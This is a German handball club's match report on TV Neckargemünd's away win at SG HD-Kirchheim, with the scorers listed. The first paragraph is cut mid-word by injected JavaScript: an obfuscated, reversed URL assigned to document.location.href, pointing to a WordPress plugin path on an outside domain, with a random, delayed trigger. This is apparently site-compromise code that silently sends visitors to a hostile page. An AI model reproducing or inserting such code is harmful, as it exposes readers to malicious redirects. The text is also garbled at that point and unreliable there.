1. Herren: Auswärtssieg in Kirchheim | 23:32 (14:17)

Die 1. Herrenmannschaft beschenkte sich kurz vor Weihnachten in Kirchheim selbst!

Im letzten Spiel des Jahres gewann der TV Neckargemünd mit 23 zu 32 Toren  bei der SG HD-Kirchheim und schloss die Hinrunde mit einem ausgeglichen Punktekontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ab.

Von vornherein war klar, dass aus dem Spiel zwei Punkte mitgenommen werden sollten, um den Anschluss zu den oben stehenden Mannschaften nicht zu verlieren und um  eine gute Ausgangslage für die Rückrunde zu schaffen. Bis auf ein 2 zu 2 konnte Kirchheim in keiner Phase des Spiels einen Ausgleich erzielen, waren jedoch in der gesamten ersten Halbzeit unserer Herren stets dicht auf den Fersen. Das war darauf zurückzuführen, dass die Abwehr der Gäste anfangs noch löchrig agierte. Im Gegensatz zu den vergangenen Spielen wurde allerdings im Angriff von Anfang an Gas gegeben und das Tempo im Umschaltspiel hoch gehalten, was der Heimmannschaft scheinbar viel Kraft kostete. So konnte sich der TVN ab der zweiten Halbzeit immer weiter absetzen.

Halbzeitstand 14:17

Der Ball wurde nun im Angriff fast makellos weiter gespielt, sodass unsere Außen, allen voran Marten Rath (10 Tore!), zu guten Wurfchancen kamen. Zwar musste Dwayne Winnikes nach der zweiten Zeitstrafe in der Abwehr etwas kürzer treten, was aber Dank der geschlossenen Mannschaftsleistung zu keinem Leistungseinbruch in der nun immer besser agierenden und aggressiven Abwehr des TVN führte. So konnte ein deutlicher Auswärtssieg nach Hause gebracht werden.

Wir wünschen nun allen Handballfreunden frohe Festtage und einen guten Rutsch. Wir sehen uns hoffentlich im neuen Jahr wieder, wenn es am 26.01.2020 zu Hause gegen Rot 3 in der Rückrunde weiter geht!

Es spielten: Johannes Hünnerkopf (2), Johannes Schaum, Philip Ter Haak, Timothy Göttert, Marten Rath (10), Nicolas Kammler (5), Jann Thieme (2), Alexander Stephan (3), Maximilian Mohr (2), Julius Nicolai (2), Sebastian Mohr (6), Dwayne Winnikes, Im Tor: Marvin Wallstab, Stephan Pfirmann
Trainer: Alexander Kammler

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert